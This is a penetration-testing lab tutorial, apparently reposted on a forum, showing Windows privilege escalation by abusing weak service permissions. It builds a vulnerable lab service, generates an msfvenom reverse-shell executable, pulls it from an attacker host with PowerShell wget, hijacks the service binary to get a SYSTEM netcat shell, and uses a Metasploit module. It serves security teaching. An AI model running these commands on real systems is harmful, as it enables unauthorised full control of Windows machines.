vanta
Data Privacy Innovator
LEVEL 1
400 XP
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting misconfigured services is one technique to increase privileges.
Table of Content
MS Windows Services
Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.
A system or a user account must be linked to a service for it to function properly. The following built-in system accounts are frequently used to operate services:
Access Rights for the Service Control Manager
The SCM creates a service object’s security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the following access.
Weak Service Permission Lab Setup
This article will help to set up a lab that focuses on two Windows weak service Permission misconfigurations that allow an attacker to get administrative privileges:
An Access Control List (ACL) for each service defines the permissions for that service. Some permissions are extremely damaging, such as:
Steps for Weak Services Permissions
Step 1: Run CMD as administrator and execute the below command to create a service with the name of Pentest inside /temp directory
Step2: To create a vulnerable service we need to assign some toxic privilege with the help of SubinACL to change the permission of services.
NOTE:
Step3: After Download SubinACL, execute the following command to assign PTOC Permissions user “ignite” against “Pentest” service.
Abusing Insecure Configuration File Permissions (PTOC)
An attacker can escalate privileges by exploiting Service Configuration if the system binaries have the SERVIC_ ALL_ACCESS or SERVICE_CHANGE_CONFIG permissions.
Following an initial foothold, you may use the wmic programme to enumerate system services and query for the service name, startname, and path.
The service name shown as pentest exits the c:/temp directory, as shown in the following image. We may verify the service configuration with the following command.
The service account type is Localsystem, and it has privileges to start, stop, and pause services, according to the output.
We can identify SERVICE ALL ACCESS or SERVICE CHANGE CONFIG permissions using the accesschk Sysinternals tool since these capabilities allow attackers to change service settings.
It says that Ignite user has full access to this service
Create an executable shell and install it on the victim’s machine, then modify the service binary path to a malicious executable since the user ignite has full access to the service and therefore has the ability to change the configuration.
Use the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.
Because the ignite user has access to edit the service configuration and subsequently start the service, thus we can change the path and point it to our reverse shell payload.
As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system
Abusing Insecure Service Executable (PTO)
If the low-privilege user has at least Pause/continue, Start, and Stop permissions for the service, an attacker may attempt to overwrite the system binaries with a malicious executable file in order to escalate privileges.
Use the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.
As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system
Metasploit
This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure configuration, file or registry permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload.
This will result in a new session as NT AUTHORITY\SYSTEM when this succeeds.
https://docs.microsoft.com/en-us/do.../introduction-to-windows-service-applications
https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Table of Content
- MS Windows Services
- Access Rights for the Service Control Manager
- Weak Service Permission Lab Setup
- Abusing Insecure Configuration File Permissions (PTOC)
- Abusing Insecure Service Executable (PTO)
- Metasploit
MS Windows Services
Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.
A system or a user account must be linked to a service for it to function properly. The following built-in system accounts are frequently used to operate services:
- LocalService
- NetworkService
- LocalSystem
Access Rights for the Service Control Manager
The SCM creates a service object’s security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the following access.
Weak Service Permission Lab Setup
This article will help to set up a lab that focuses on two Windows weak service Permission misconfigurations that allow an attacker to get administrative privileges:
- Insecure Configuration File Permissions: A low-privileged user can update service settings, such as the service binary that runs when the service starts.
- Insecure Service Executable: When the service starts, a low-privileged user can overwrite the binary it launches.
An Access Control List (ACL) for each service defines the permissions for that service. Some permissions are extremely damaging, such as:
- Command: sc qc <service> – to query the configuration of the service
- Command: sc query <service> – to check the current status of the service
- Command: net start/stop <service> – to start and stop the service
- Command: sc config <service> <option>= <value> – change the configuration of the service
Steps for Weak Services Permissions
Step 1: Run CMD as administrator and execute the below command to create a service with the name of Pentest inside /temp directory
Code:
sc.exe create pentest binPath= "C:\temp\service.exe"Step2: To create a vulnerable service we need to assign some toxic privilege with the help of SubinACL to change the permission of services.
NOTE:
Step3: After Download SubinACL, execute the following command to assign PTOC Permissions user “ignite” against “Pentest” service.
Code:
cd C:\Program Files (x86)\Windows Resource Kits\Tools
subinacl.exe /service pentest /grant=msedgewin10\ignite=PTOCAbusing Insecure Configuration File Permissions (PTOC)
An attacker can escalate privileges by exploiting Service Configuration if the system binaries have the SERVIC_ ALL_ACCESS or SERVICE_CHANGE_CONFIG permissions.
Following an initial foothold, you may use the wmic programme to enumerate system services and query for the service name, startname, and path.
Code:
wmic service get name,startname,pathnameThe service name shown as pentest exits the c:/temp directory, as shown in the following image. We may verify the service configuration with the following command.
Code:
sc qc pentestThe service account type is Localsystem, and it has privileges to start, stop, and pause services, according to the output.
We can identify SERVICE ALL ACCESS or SERVICE CHANGE CONFIG permissions using the accesschk Sysinternals tool since these capabilities allow attackers to change service settings.
Code:
accesschk.exe /accepteula –uwcqv ignite pentestIt says that Ignite user has full access to this service
Create an executable shell and install it on the victim’s machine, then modify the service binary path to a malicious executable since the user ignite has full access to the service and therefore has the ability to change the configuration.
Code:
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe
python –m SimpleHTTPserver 80Use the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.
Code:
cd c:\Users\public
powershell wget http://192.168.1.3/shell.exe -o shell.exe
dirBecause the ignite user has access to edit the service configuration and subsequently start the service, thus we can change the path and point it to our reverse shell payload.
Code:
sc config pentest binPath= "C:\Users\Public\shell.exe"
net start pentestAs soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system
Code:
nc –lvp 8888
whoamiAbusing Insecure Service Executable (PTO)
If the low-privilege user has at least Pause/continue, Start, and Stop permissions for the service, an attacker may attempt to overwrite the system binaries with a malicious executable file in order to escalate privileges.
Code:
cd c:\temp
dir
move service.exe service.bakUse the following command to transfer malicious shell.exe into C:/temp and start a new Netcat listener within Kali Linux.
Code:
powershell wget http://192.168.1.3/shell.exe -o service.exeAs soon as the service will launch, the attacker will get a reverse connection in the new netcat session as NT Authority \system
Code:
nc –lvp 8888
whoamiMetasploit
This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure configuration, file or registry permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload.
Code:
use exploit/windows/local/service_permissions
set lhost 192.168.1.3
set session 1
exploitThis will result in a new session as NT AUTHORITY\SYSTEM when this succeeds.
https://docs.microsoft.com/en-us/do.../introduction-to-windows-service-applications
https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here